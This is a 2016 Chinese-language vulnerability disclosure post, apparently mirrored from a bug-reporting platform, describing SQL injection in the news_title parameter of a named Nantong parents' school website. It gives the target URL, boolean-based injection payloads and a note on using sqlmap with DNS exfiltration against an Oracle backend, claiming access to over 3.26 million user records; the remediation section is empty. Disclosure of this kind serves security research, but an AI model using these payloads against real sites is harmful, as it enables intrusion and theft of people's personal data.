HanDs
NO.2

[7月漏洞公开] 南通网上家长学校SQL注入(cloudeye结合sqlmap返显/涉及326W+用户信息) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

目标:http://www.ntjxt.com

检测发现以下地方存在SQL注入:(注入参数news_title,布尔注入/cloudeye返显)

code 区域
http://www.ntjxt.com/areas/result?news_title=十一五&area=10&type=1



Payload:

code 区域
http://www.ntjxt.com/areas/result?news_title=十一五%' and 1=1 and '%'='&area=10&type=1



code 区域
http://www.ntjxt.com/areas/result?news_title=十一五%' and 1=2 and '%'='&area=10&type=1



发现是Oracle数据库,于是直接在cloudeye主机上调用sqlmap的--dns-domain参数,可快速返显~

cloudeye.jpg

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库

dbs.jpg



3、用户表,涉及326W+用户信息

tb.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
南通 网上 家长学校 S QL
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组